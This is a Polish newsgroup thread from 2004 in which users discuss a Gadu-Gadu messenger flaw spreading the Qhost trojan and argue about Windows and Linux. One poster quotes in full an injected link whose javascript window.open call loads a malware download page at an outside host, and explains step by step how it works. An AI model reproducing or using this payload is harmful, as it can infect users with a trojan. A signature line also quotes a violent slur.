Nowe zagrożenie w Gadu-Gadu: Trojan Qhost roznoszony przez wyspecjalizowane wiadomości

Sat Dec 25, 2004 10:39 pm   

ehh, urzekłeś mnie z tym porównaniem hehe, być nie powinna tak samo jak
właściciel psa powinien zbierać odchody po swoim zwierzaku (co w praktyce
wygląda dokładnie tak samo jak w necie - nikt nie zbiera tylko omija ) Nie
wiedziałem czy się otwiera ale uważam, że reszta grupy powinna wiedzieć o
czymś takim... Tak apropo to Microsoft ma niedługo odciąć bezpłatny update
dla użytkowników windows (tych nie legalnych). Dziś każdy może ściągnąć
patha z ich strony, mają zrobić tak, że przed ściąganiem trzeba będzie się
zalogować, a żeby uzyskać login i hasło, trzeba być zarejestrowanym
użytkownikiem... Znów twórcy linux'a będą próbować swoich sił w prześciganiu
się o rynek - i pewnie wiele osób się przerzuci...

Pozdrawiam!

Sun Dec 26, 2004 12:09 pm   

nie sadze, linux wymaga raczej wiekszej pracy i wiedzy... az czasami mnie
denerwuje :(

A coz, firma sie borni i jest to zrozumiale.

Sun Dec 26, 2004 1:01 pm   

ale jest darmowy i przy odpowiednim skonfigurowaniu jest bardziej wydajny od
Windows, udostepnia wiecej opcji, a wiekszosc oprogramowania na linux'a jest
darmowa


nie do konca tak jest! Myslisz ze po co Microsoft pozwala dzis na kopiowanie
swoich produktow i udostepnia update kazdemu uzystkownikowi (nawet
nielegalnemu)?? W ten sposob Ms opanowal rynek, i tylko umacnia swoja
sile...

Mon Dec 27, 2004 9:11 am   

BYRRT! napisał(a):

Pokazuje kod. Ktory tez nie jest wirusem. Uruchomienie tego kodu pod
internet explorerem (i to w specyficzny sposob, nie zwykle wklejenie czy
cos) powoduje dopiero sciagniecie z internetu trojana i jesli sie ma
dziurawego IE - uruchomienie. To jak link do stron porno - link jest
nieszkodliwy, ale jesli klikniesz i wleziesz tam to od razu zaladuja Ci
sie wirusy, trojany lub dialery. Rozumiesz? Noz lezy na stole - nic.
Bierzesz go i tniesz sobie reke - boli i krzywdzi. Ten kod to nawet nie
opis noza, to adres gdzie on dopiero lezy.

BartMan

Mon Dec 27, 2004 9:24 am   

BYRRT! napisał(a):

posty. Nawet nie ma tam bajta binarki, tzn. nie-znaku z alfabetu.

jakiegos urzadzenia, a samo napiecie jest grozne dla zdrowia, to takze
czyni zle? Bo prad moze porazic i jest niebezpieczny, wiec mowienie o
tym jest przyzwoleniem dla niebezpieznego zjawiska. Wyglada na to, ze
nie rozumiesz czym sa te 2 linijki i dlatego opisujesz je jakby to byla
magidzna formula.

Jesli dam link do strony z pornografia, to czy sam link jest szkodliwy

wladuja trojany. Dokladnie jest z tym linkiem.
LINKI NIE JEST WIRUSEM. Nie przypisujcie mu wlasciwosci magicznych. Oto
jak dziala formula pod GG:

www.po"style=background-image:url(javascript:window.open('http://iframedolla
rs.biz/dl/adv407.php','','left=10000'));".pl


Widzimy tu poczatek w postaci
www.po
to wystarczy by durne GG myslalo, ze to link http. Podkresla wiec cala
linijke az do napodkania konca adresu
..pl

poniewaz GG ma w srodku zagniezdzonego IE, tzn. kozysta z niego do
wyswietlenia wiadomosci w okienku rozmowy (tak, tak, GG generuje nasze
rozmowy w postaci kodu HTML i wowczas prosi IE o wyswietlenie tego w
okienku rozmowy). A wiec zamieniamy link na kod html:

www.po"style=background-image:url(javascript:window.open('http://iframedolla
rs.biz/dl/adv407.php','','left=10000'));".pl
">
www.po"style=background-image:url(javascript:window.open('http://iframedolla
rs.biz/dl/adv407.php','','left=10000'));".pl


Przyjrzyjcie sie uwaznie - dopisalem 1,4,5,6,7 i 8 linijke, z tym ze 6 i
7 to ten sam kod aby nadal sie wyswietlal w okienku. Dla zrozumienia
jesli w okienku rozmowy wpiszemy link www.onet.pl to GG zamieni na
www.onet.pl
">
www.onet.pl

i teraz nasz rozmowca (i my) moze kliknac na ten link i mu sie otworzy.
Wracajac do przykladu - mamy kawalek kodu HTML jak wyzej i teraz go
zanalizujmy od strony dzialania pod IE.
<A HREF="www.po"
jest to adres jaki widzi IE, potem jest

style=background-image:url(javascript:window.open('http://iframedolla
rs.biz/dl/adv407.php','','left=10000'));

ktory IE interpretuje juz nie jako adres (bo jest poza "") tylko jako
styl (upiekszenie, opis wygladu linku), ktory mowi jaki ma byc obrazek w
tle linku "www.po". Obrazkiem ma byc cos co znajduje sie pod adresem -
komenda 'url'.
i tu jako adres url zamiast adresu do obrazka jest kawalek kodu
JavaScript (do cholerki, nie Java!)
window.open('http://iframedollars.biz/dl/adv407.php','','left=10000')
Jesli chcecie i macie antywira mozecie sobie adres
http://iframedollars.biz/dl/adv407.php
wywolac w IE i sciagniecie tego wirusa.
Cala linijka z window.open mowi, ze IE ma otworzyc nowe okienko,
zaladowac tam strone
http://iframedollars.biz/dl/adv407.php
no a tam siedzi wirus.
Caly blad ie to moim zdaniem mozliwosc wykonania kodu JavaScriptowego w
urlu. Url (adres) powinien juz byc tylko urlem. Choc z drugiej strony
taki mechanizm jest bardzo przydatny przy projektowaniu stron.

Podsumowujac, GG jest potwornie dziurawy i szajsowo napisany. Samo
wykorzystanie innego programu do obslugi rozmowy mowi nam na jaka
latwizne poszli programisci, w dodatku nie wycinajac nieporzadanych
funkcji. Ble!

Mam nadzieje ze kazdy zrozumial moj opis i juz nikt nie bedzie uwazal ze
to zarazony post lub wirus w czystej postaci.

BartMan

Mon Dec 27, 2004 10:28 am   

od razu mięsem mi tu...


Chyba mało co się przyjrzałeś dyskusji i krytykujesz, gdybyś czytał DOBRZE
wiedziałbyś ze to ja zacząłem temat wiec bardzo DOBRZE ze dyskusja ma
miejsce, jednak gadanie tekstów takich jak Ty w tym momencie jest dla mnie
pozbawione sensu! Skoro prąd jest niebezpieczny dla życia i zdrowia
(rozumiem ze porównujesz do wirusa) to powinno się o tym gadać i
minimalizować możliwość porażenia (przesyłania wirusa dalej i zarażania
dalej). Sam się nie trzymasz kupy bo raz mówisz ze to niebezpieczne i
porównujesz do prądu, a potem krytykujesz wszystkich i wszystko ze to wirus
nie jest!


Komentować nie będę bo nie pisałem nic co ja o tym twierdze!


tyle ze samych linkow nie wyłapuje NAV - zastanów się czasem!


i żebyś nie miał wątpliwości ja to wszystko po krotce rozumiem, tylko po co
to wszystko?? Dziennie na te grupę wysyłane są setki postów i tylko ten
jeden ma taki mankament! To jest dziwne - i czego Ty bronisz??

Mon Dec 27, 2004 11:17 am   

BYRRT! napisał(a):

jest to wirus. I nie Tobie rzucam miesem. Chyba za bardzo osobiscie
traktujesz te posty. To sa posty na grupe. Publiczne, na publiczna
grupe. I nie pisz, ze w zwiazku z tym nie powinienem pisac "cholerka".





kazdy dywaguje nad tym ze to wirus, ze cos strasznego, ze niebezpieczne.
Jesli rozumiesz jak dziala, to wiesz czego sie obawiac - np. nie
klikniesz na niego.

Jest niebezpieczny jesli go wkleic do GG w starszej wersji (6.0) i tyle.
Szczegolnie nie jest niebezpeiczny dla Twojego klienta newsow.

Ja nie bronie. Ja tylko tlumacze jak dzialal ten link pod GG. Serio, nie
rozumiem o co Ci chodzi.

Pozdrawiam.
BartMan

Mon Dec 27, 2004 3:43 pm   

J.F. napisał(a):

laduje sie wirus, jakbys kliknal na niego.

wystarczy kolorowanie textu i graficzka. Programisci posszli na latwizne
i zaplacili bledami soft nie od nich zaleznego (IE) i nie zabezpeiczyli
sie od kodu nie potrzebnego w czasie rozmowy (javascript).

Idac dalej tym tropem, nie moge zmusic, zeby GG uzywalo firefoxa.

zachowal sie prawidlowo, uruchomil kod JavaScript, bo do tego tez zostal
napisany. GG nei przefiltrowalo Javascriptu z HTMLa.


Mysle ze ciagniecie tego watku nie ma sensu. Ludzi rzucaja sie na mnie,
nie wiadomo za co. Ja rozumiem mechanizm dzialania tego exploita. Widze,
ze wina jest po stronie GG, co sami programisci udowodnili wypuszczajac
poprawiona wersje GG - gdyby to nie byla ich wina, trzeba byloby czekac
na late z MS.

Konczac dywagacje, pozdrawiam. Nie mialem zamiaru nikogo urazic.

BartMan

Tue Dec 28, 2004 10:34 am   

BYRRT! napisal(a):


Jak to mowia, jest darmowy dla tych, ktorych czas jest bezwartosciowy.

--
Pozdrowienia, Marcin E. Hamerla

"Jak ja was, kurrwy, nienawidzę, jak do was bym z kałacha bił."